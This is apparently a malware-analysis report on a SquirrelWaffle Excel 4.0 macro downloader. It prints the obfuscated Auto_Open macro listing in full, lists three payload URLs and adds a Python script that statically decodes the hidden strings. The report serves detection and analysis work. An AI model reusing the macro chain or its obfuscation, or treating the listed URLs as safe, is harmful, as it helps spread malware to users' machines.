SquirrelWaffle — Office (OLE) / .XLS malware analysis

Static analysis result for SHA-256 3f453d0703fa8170…

Verdict: MALICIOUS

File type: Office (OLE) / .XLS

Size: 263.0 KB
Created: 2015-06-05 18:19:34
Authoring application: Microsoft Excel
First seen: 2021-09-25

MD5: 77bd39191fdc817f2f14f0462bff8d86
SHA-1: ea94f85f59615cfec1b3d330810e9d91ff79bd71
SHA-256: 3f453d0703fa81709d25c6ade25215066f38abceec9699b7b49fb9b4171bbb50

Risk Score: 302

Malware Insights

SquirrelWaffle · confidence 95%

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1204.002 User Execution: Malicious File
  • T1059.001 Command and Scripting Interpreter: PowerShell
  • T1059.003 Command and Scripting Interpreter: Windows Command Shell

The sample is a BIFF8 (.xls) workbook with one visible worksheet (Shee) followed by a run of hidden worksheets and hidden Excel 4.0 macro sheets. The built-in name Auto_Open points at frm.!E1, so the XLM chain runs as soon as macros are enabled, with no VBA involved. Its strings are never stored contiguously: each character is produced by a CHAR() formula over a subtraction (or over _xlfn.ARABIC() of a Roman numeral) on a hidden sheet, CONCATENATE() formulas on another sheet assemble those characters by cross-sheet reference, and FORMULA() calls on the macro sheets copy the results into further cells at run time. Working the CHAR() arithmetic through the CONCATENATE() chains in the extracted listing yields strings such as Shell32, ShellExecuteA, CreateDirectoryA, open and regsvr32, which matches the ShellExecute heuristic and is consistent with a downloader that stages a payload and hands it to regsvr32. ClamAV's Xls.Downloader.SquirrelWaffle signature corroborates the static heuristics. The three embedded URLs are the likely second-stage sources; they were recovered statically and should be treated as indicators, not as confirmed live payload hosts.

Heuristics (7)

  • ClamAV: Xls.Downloader.SquirrelWaffle20921-9895790-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Downloader.SquirrelWaffle20921-9895790-0
  • Excel 4.0 Auto_Open defined name [critical] OLE_XLM_AUTOOPEN_DEFINEDNAME
    oletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry (here the built-in name Auto_Open resolves to frm.!E1).
  • XLM Auto_Open with dangerous formula APIs [critical] OLE_XLM_DANGEROUS_FN
    Excel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and dangerous XLM formula APIs that can invoke programs, write files, or transfer control without VBA.
  • URL reconstructed from XLM cell array (3 URLs) [critical] OLE_XLM_CELL_ARRAY_URL
    Excel 4.0 macro sheets stage their payload URL in one of three ways: across the BIFF8 Shared String Table (one quoted-char SST entry per character, concatenated with & at run time), across individual numeric cells (one ASCII char code per cell), or split across multi-char fragment cells that a download formula concatenates by reference (=A1&A2&… / CONCATENATE(...)). The reconstructed URL is invisible to literal-bytes URL extraction because it is never contiguous in the workbook stream. URLs were recovered by walking the BIFF8 record stream and decoding SST entries, LABELSST/RK/NUMBER cells, and FORMULA cell-reference concatenation in token order. In this sample the listing shows a variant of the per-character channel: each character is a CHAR() formula over a subtraction (or over _xlfn.ARABIC() of a Roman numeral) on a hidden sheet, and CONCATENATE() formulas on another sheet assemble them by cross-sheet reference.
  • Reference to ShellExecute API [high] SC_STR_SHELLEXEC
    Reference to ShellExecute API
  • Excel 4.0 (XLM) macro sheet present [medium] OLE_XLM_AUTOOPEN
    Workbook contains an Excel 4.0 macro sheet sub-stream. XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
      • https://cortinastelasytrazos.com/Yro6Atvj/sec.html (referenced by macro)
      • https://orquideavallenata.com/4jmDb0s9sg/sec.html (referenced by macro)
      • https://fundacionverdaderosheroes.com/gY0Op5Jkht/sec.html (referenced by macro)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: xlm_macros.txt
Kind: xlm-macro
Source: oletools.olevba.extract_all_macros (XLM macro listing)
Size: 9167 bytes
SHA-256: 125eeb65449215b38b4c93bcf67effc9a2990373b692ed6d0729f78b6e651f74
Extracted script (first 1,000 lines; the listing below is complete at 125 lines). The BOUNDSHEET records come first, then the cell dump in Sheet,Reference,Formula,Value form. Note that the dump labels the CHAR() cells as sheet su and the CONCATENATE() cells as sheet ep, while the formulas that consume them address the same coordinates as Shee!… and N!…; when following the chain by hand, match on cell coordinates rather than trusting the sheet label on each row.
' 0085     13 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible -  Shee
' 0085     10 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, hidden -  N
' 0085     11 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, hidden -  su
' 0085     11 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, hidden -  ep
' 0085     11 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, hidden -  ep
' 0085     11 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, hidden -  ep
' 0085     11 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, hidden -  ep
' 0085     11 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, hidden -  ep
' 0085     11 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, hidden -  ep
' 0085     11 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, hidden -  ep
' 0085     11 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, hidden -  ep
' 0085     11 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, hidden -  ep
' 0085     12 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, hidden -  frm
' 0085     13 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, hidden -  frm.
' 0085     14 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, hidden -  frm..
' 0085     12 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, hidden -  fev
' 0085     12 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, hidden -  fte
' 0085     11 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, hidden -  ch
' 0085     11 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, hidden -  ci
' 0018     29 LABEL : Cell Value, String Constant - _xlfn.ARABIC hidden len=2 ptgErr  *INCOMPLETE FORMULA PARSING* Remaining, unparsed expression: b'\x1d'
' 0018     23 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open len=7 ptgRef3d  frm.!E1 
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' Sheet,Reference,Formula,Value
'  su,D1,CHAR(200-86),""
'  su,G2,CHAR(109-61),""
'  su,K2,CHAR(190-91),""
'  su,O2,CHAR(150-68),""
'  su,C3,CHAR(200-99),""
'  su,M3,CHAR(184-99),""
'  su,H4,CHAR(200-133),""
'  su,N4,CHAR(179-103),""
'  su,B5,CHAR(200-125),""
'  su,E5,CHAR(101-50),""
'  su,J5,CHAR(250-134),""
'  su,P5,CHAR(230-130),""
'  su,F7,CHAR(100-50),""
'  su,I7,CHAR(210-113),""
'  su,L7,CHAR(220-109),""
'  su,Q7,CHAR(157-88),""
'  su,N8,CHAR(180-61),""
'  su,A9,CHAR(201-91),""
'  su,C9,CHAR(210-102),""
'  su,H10,CHAR(140-72),""
'  su,J10,CHAR(230-109),""
'  su,P10,CHAR(186-102),""
'  su,D11,CHAR(140-91),""
'  su,L11,CHAR(192-100),""
'  su,E12,CHAR(190-75),""
'  su,I12,CHAR(220-115),""
'  su,Q12,CHAR(190-70),""
'  su,S12,CHAR(207-104),""
'  su,B13,CHAR(101-36),""
'  su,O13,CHAR(160-90),""
'  su,K14,CHAR(145-99),""
'  su,D15,CHAR(145-71),""
'  su,G15,CHAR(210-93),""
'  su,P15,CHAR(190-86),""
'  su,T15,CHAR(197-85),""
'  su,L16,CHAR(150-84),""
'  su,E17,CHAR(230-172),""
'  su,I17,CHAR(205-96),""
'  su,Q17,CHAR(240-122),""
'  su,N18,CHAR(150-67),""
'  su,B19,CHAR(220-108),""
'  su,J21,CHAR(108-55),""
'  su,H32,_xlfn.ARABIC("CXI"),""
'  su,D35,_xlfn.ARABIC("CI"),""
'  su,K43,_xlfn.ARABIC("LXVII"),""
'  ep,I2,"CONCATENATE( Shee!S24, Shee!N18, Shee!P15, Shee!C3, Shee!C9, Shee!C9, Shee!E5, Shee!F7, Shee!S24, Shee!S25)",""
'  ep,Q4,"CONCATENATE( Shee!S24, Shee!L7, Shee!T15, Shee!C3, Shee!A9, Shee!S24, Shee!S25)",""
'  ep,D5,"CONCATENATE( Shee!S24, Shee!H4, Shee!D1, Shee!C3, Shee!I7, Shee!J5, Shee!C3,, Shee!H10, Shee!I12, Shee!D1, Shee!C3, Shee!K2, Shee!J5, Shee!L7, Shee!D1, Shee!J10, Shee!B13, Shee!S24, Shee!S25)",""
'  ep,L7,"CONCATENATE( Shee!S24, Shee!N18, Shee!P15, Shee!C3, Shee!C9, Shee!C9, Shee!Q7, Shee!Q12, Shee!C3, Shee!K2, Shee!G15, Shee!J5, Shee!C3, Shee!B13, Shee!S24, Shee!S25)",""
'  ep,S7,"CONCATENATE( Shee!S24, Shee!D1, Shee!C3, Shee!S12, Shee!E12, Shee!Q17, Shee!D1, Shee!E5, Shee!F7, Shee!S24, Shee!S25)",""
'  ep,H9,"CONCATENATE( Shee!S24, Shee!M3, Shee!O2,)",""
'  ep,F10,"CONCATENATE( Shee!S24, Shee!D15, Shee!H4, Shee!D15, Shee!S24, Shee!S25)",""
'  ep,O11,"CONCATENATE( Shee!S24, Shee!D15, Shee!D15, Shee!H4, Shee!H4, Shee!H4, Shee!D15, Shee!D15, Shee!S24, Shee!S25)",""
'  ep,B13,"CONCATENATE( Shee!S24, Shee!B5, Shee!C3, Shee!D1, Shee!A9, Shee!C3, Shee!C9, Shee!E5, Shee!F7, Shee!S24, Shee!S25)",""
'  ep,H14,"CONCATENATE( Shee!S24, Shee!D15, Shee!D15, Shee!H4, Shee!H4, Shee!L16, Shee!L16, Shee!S24, Shee!S25)",""
'  ep,F15,"CONCATENATE( Shee!S24, Shee!G15, Shee!D1, Shee!C9, Shee!I17, Shee!L7, Shee!A9, Shee!S24, Shee!S25)",""
'  ep,D17,"CONCATENATE( Shee!S24, Shee!H4, Shee!E17, Shee!L11, Shee!H10, Shee!I7, Shee!J5, Shee!L7, Shee!B19, Shee!S24, Shee!S25)",""
'  ep,B21,"CONCATENATE( Shee!S24, Shee!H4, Shee!E17, Shee!L11, Shee!H10, Shee!I7, Shee!J5, Shee!L7, Shee!B19, Shee!L11, Shee!J5, Shee!C3, Shee!E12, Shee!J5, Shee!D11, Shee!K14, Shee!J5, Shee!C3, Shee!E12, Shee!J5, Shee!S24, Shee!S25)",""
'  ep,G24,"CONCATENATE( Shee!S24, Shee!H4, Shee!E17, Shee!L11, Shee!H10, Shee!I7, Shee!J5, Shee!L7, Shee!B19, Shee!L11, Shee!J5, Shee!C3, Shee!E12, Shee!J5, Shee!K14, Shee!J5, Shee!C3, Shee!E12, Shee!J5, Shee!S24, Shee!S25)",""
'  ep,E28,"CONCATENATE( Shee!S24, Shee!H4, Shee!E17, Shee!L11, Shee!H10, Shee!I7, Shee!J5, Shee!L7, Shee!B19, Shee!L11, Shee!J5, Shee!C3, Shee!E12, Shee!J5, Shee!F7, Shee!K14, Shee!J5, Shee!C3, Shee!E12, Shee!J5, Shee!S24, Shee!S25)",""
'  ep,I10,"CONCATENATE( Shee!N4, Shee!H10,)",""
'  ep,I11,"CONCATENATE( Shee!L7, Shee!N8,)",""
'  ep,H12,"CONCATENATE( Shee!A9, Shee!C9,)",""
'  ep,J8,"CONCATENATE( Shee!L7, Shee!I7,)",""
'  ep,I11,"CONCATENATE( Shee!P5, Shee!P10,)",""
'  ep,N8,"CONCATENATE(, Shee!O13, Shee!I12, Shee!C9, Shee!S46)",""
'  ep,I12,"CONCATENATE( Shee!B13, Shee!S24, Shee!S25)",""
'  ep,F9,"CONCATENATE( Shee!G2, Shee!S25)",""
'  frm,E8,"FORMULA( N!B13, su!H21)=FORMULA( N!D5, su!H22)=FORMULA( ep!D4, ep!E22)=FORMULA( N!F10, su!H23)=FORMULA( frm!G14, ep!I9)=FORMULA( N!D17, su!H24)=FORMULA( N!H9& ep!I10& ep!I11& ep!H12& ep!J8& ep!I11& ep!I9& ep!N8& ep!E22& fev!I12, su!H27)=FORMULA( Shee!G2, su!H25)=FORMULA( N!F15, su!H26)=FORMULA( frm..!F9, su!H29)=FORMULA( N!H14, su!H28)=FORMULA( N!G24, su!H31)=FORMULA( N!I2, su!H34)=FORMULA( N!L7, su!H35)=FORMULA( fte!G12, ch!C18)=FORMULA( N!O11, su!H36)=FORMULA( N!Q4, su!H38)=FORMULA( N!B21, su!H58)=FORMULA( N!S7, su!H39)=FORMULA( N!G24, su!H40)=FORMULA( N!E28, su!H60)=FORMULA( Shee!J21, su!H42)=FORMULA( Shee!P31& ch!C18& Shee!P34& Shee!P35& Shee!P35& Shee!P36& su!H21& su!H22& su!H23& su!H24& su!H25& Shee!P37, frm.!E15)=FORMULA( Shee!P31& ch!C18& Shee!P34& Shee!P35& Shee!P35& Shee!P36& su!H34& su!H35& su!H36& su!H29& su!H38& su!H39& su!H40& su!H29& su!H42& Shee!P37, frm.!E19)=FORMULA( Shee!P31& ch!C18& Shee!P34& Shee!P35& Shee!P35& Shee!P36& su!H26& su!H27& su!H28& su!H29& N!I18& su!H31& su!H29& su!H25& Shee!P37, frm.!E17)=FORMULA( Shee!P31& ch!C18& Shee!P34& Shee!P35& Shee!P35& Shee!P36& su!H26& su!H27& su!H28& su!H29& N!I19& su!H58& su!H29& su!H25& Shee!P37, frm.!E21)=FORMULA( Shee!P31& ch!C18& Shee!P34& Shee!P35& Shee!P35& Shee!P36& su!H34& su!H35& su!H36& su!H29& su!H38& su!H39& su!H58& su!H29& su!H42& Shee!P37, frm.!E23)=FORMULA( Shee!P31& ch!C18& Shee!P34& Shee!P35& Shee!P35& Shee!P36& su!H26& su!H27& su!H28& su!H29& N!I20& su!H60& su!H29& su!H25& Shee!P37, frm.!E25)=FORMULA( Shee!P31& ch!C18& Shee!P34& Shee!P35& Shee!P35& Shee!P36& su!H34& su!H35& su!H36& su!H29& su!H38& su!H39& su!H60& su!H29& su!H42& Shee!P37, frm.!E27)",""
'  frm..,D11,"FORMULA(CHAR(200-99), ep!I9)",""
'  fev,G14,CHAR( Shee!H32),""
'  fte,D4,CHAR( Shee!D35),""
'  ci,G12,CHAR( Shee!K43),""
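The layering in the listing above (a CHAR() over a subtraction per character, _xlfn.ARABIC() of a Roman numeral fed to CHAR(), and CONCATENATE() of cross-sheet references, which is the fragment-cell channel the OLE_XLM_CELL_ARRAY_URL heuristic describes) can be undone statically without ever opening the workbook. The Python below is an added example written for this report; it is not part of oletools and the sample did not ship it. It parses a handful of the Sheet,Reference,Formula,Value rows copied from the listing and follows the references the way Excel would at Auto_Open. One assumption is baked in and labelled in the code: the dump labels the CHAR() cells as sheet su and the CONCATENATE() cells as sheet ep, whereas the formulas address them as Shee! and N!, so the resolver maps Shee to su and N to ep. Cells the dump does not show (Shee!S24 and Shee!S25 among them) are left as visible {Sheet!Ref} placeholders rather than guessed.

```python
"""Statically resolve the CHAR()/ARABIC()/CONCATENATE() layering in an olevba XLM cell dump.
Added example for this report (not oletools code): follows cell references the way Excel would
at Auto_Open and keeps visible placeholders for cells the dump does not contain."""
import re

# ASSUMPTION: the dump labels the CHAR() cells 'su' and the CONCATENATE() cells 'ep', while the
# formulas address those same coordinates as Shee!<ref> and N!<ref>. Aliasing them is an
# inference from this listing, not documented olevba behaviour; adjust it for other samples.
SHEET_ALIAS = {"Shee": "su", "N": "ep"}

# Rows copied from the listing above (only the cells the targets below need).
DUMP = """\
'  su,D1,CHAR(200-86),""
'  su,K2,CHAR(190-91),""
'  su,C3,CHAR(200-99),""
'  su,E5,CHAR(101-50),""
'  su,J5,CHAR(250-134),""
'  su,F7,CHAR(100-50),""
'  su,L7,CHAR(220-109),""
'  su,Q7,CHAR(157-88),""
'  su,A9,CHAR(201-91),""
'  su,C9,CHAR(210-102),""
'  su,E12,CHAR(190-75),""
'  su,Q12,CHAR(190-70),""
'  su,S12,CHAR(207-104),""
'  su,B13,CHAR(101-36),""
'  su,G15,CHAR(210-93),""
'  su,P15,CHAR(190-86),""
'  su,T15,CHAR(197-85),""
'  su,Q17,CHAR(240-122),""
'  su,N18,CHAR(150-67),""
'  su,H32,_xlfn.ARABIC("CXI"),""
'  ep,I2,"CONCATENATE( Shee!S24, Shee!N18, Shee!P15, Shee!C3, Shee!C9, Shee!C9, Shee!E5, Shee!F7, Shee!S24, Shee!S25)",""
'  ep,Q4,"CONCATENATE( Shee!S24, Shee!L7, Shee!T15, Shee!C3, Shee!A9, Shee!S24, Shee!S25)",""
'  ep,L7,"CONCATENATE( Shee!S24, Shee!N18, Shee!P15, Shee!C3, Shee!C9, Shee!C9, Shee!Q7, Shee!Q12, Shee!C3, Shee!K2, Shee!G15, Shee!J5, Shee!C3, Shee!B13, Shee!S24, Shee!S25)",""
'  ep,S7,"CONCATENATE( Shee!S24, Shee!D1, Shee!C3, Shee!S12, Shee!E12, Shee!Q17, Shee!D1, Shee!E5, Shee!F7, Shee!S24, Shee!S25)",""
'  fev,G14,CHAR( Shee!H32),""
"""

ROW = re.compile(r'^([^,]+),([^,]+),(.*),("[^"]*")$')   # sheet,ref,formula,"value"
REF = re.compile(r'^(?:([\w.]+)!)?([A-Z]{1,3}\d+)$')     # Shee!S24, frm.!E15, B13
ROMAN = {"I": 1, "V": 5, "X": 10, "L": 50, "C": 100, "D": 500, "M": 1000}

def arabic(numeral):
    """Excel ARABIC(): Roman numeral to integer, e.g. "CXI" -> 111, "LXVII" -> 67."""
    v = [ROMAN[c] for c in numeral]
    return sum(-x if i + 1 < len(v) and v[i + 1] > x else x for i, x in enumerate(v))

def parse_dump(text):
    """Return {(sheet, ref): formula} from olevba's 'Sheet,Reference,Formula,Value' rows."""
    cells = {}
    for line in text.splitlines():
        m = ROW.match(line.lstrip("' ").rstrip())
        if m:
            cells[(m[1].strip(), m[2].strip())] = m[3].strip().strip('"')
    return cells

class Resolver:
    def __init__(self, cells, alias=SHEET_ALIAS):
        self.cells, self.alias, self.memo, self.unresolved = cells, alias, {}, set()

    def cell(self, sheet, ref, stack=()):
        key = (self.alias.get(sheet, sheet), ref)
        if key in self.memo:
            return self.memo[key]
        if key not in self.cells or key in stack:  # not in the dump, or a reference cycle
            self.unresolved.add(f"{sheet}!{ref}")
            return "{%s!%s}" % (sheet, ref)       # never guess: leave a visible marker
        self.memo[key] = self.formula(self.cells[key], key[0], stack + (key,))
        return self.memo[key]

    def arg(self, text, sheet, stack):
        text = text.strip()
        if not text:                               # CONCATENATE(a,, b) has empty arguments
            return ""
        if m := re.fullmatch(r'(\d+)\s*-\s*(\d+)', text):  # CHAR(200-86): arithmetic hides the byte
            return int(m[1]) - int(m[2])
        if m := REF.match(text):
            return self.cell(m[1] or sheet, m[2], stack)
        return self.formula(text, sheet, stack)

    def formula(self, f, sheet, stack):
        f = f.strip()
        if m := re.fullmatch(r'CHAR\((.*)\)', f):
            v = self.arg(m[1], sheet, stack)
            return chr(v) if isinstance(v, int) else f"CHAR({v})"
        if m := re.fullmatch(r'_xlfn\.ARABIC\("([IVXLCDM]+)"\)', f):
            return arabic(m[1])
        if m := re.fullmatch(r'CONCATENATE\((.*)\)', f):
            return "".join(str(self.arg(p, sheet, stack)) for p in m[1].split(","))
        return f                                    # FORMULA(), CALL(), ... reported verbatim

def decode(dump=DUMP, targets=(("ep", "I2"), ("ep", "Q4"), ("ep", "L7"), ("ep", "S7"), ("fev", "G14"))):
    """Map 'Sheet!Ref' -> resolved string for each target; unknown inputs stay as {Sheet!Ref}."""
    r = Resolver(parse_dump(dump))
    return {f"{s}!{c}": str(r.cell(s, c)) for s, c in targets}

if __name__ == "__main__":
    for name, value in decode().items():
        print(f"{name:>8} = {value}")
```

Running it resolves ep!I2, ep!Q4, ep!L7 and ep!S7 to Shell32, open, ShellExecuteA and regsvr32, each bracketed by the unresolved Shee!S24 and Shee!S25 cells, and fev!G14 to the single letter o (CHAR of ARABIC("CXI") = 111). Extending the target list to the FORMULA() chain in frm!E8 would need the Shee!P31…P37 cells, which are absent from the dump, and the su!H21…H60 cells, which are only populated at run time by FORMULA() writes; the full command line is therefore not recoverable from this static listing alone, and the placeholders make that gap explicit instead of hiding it.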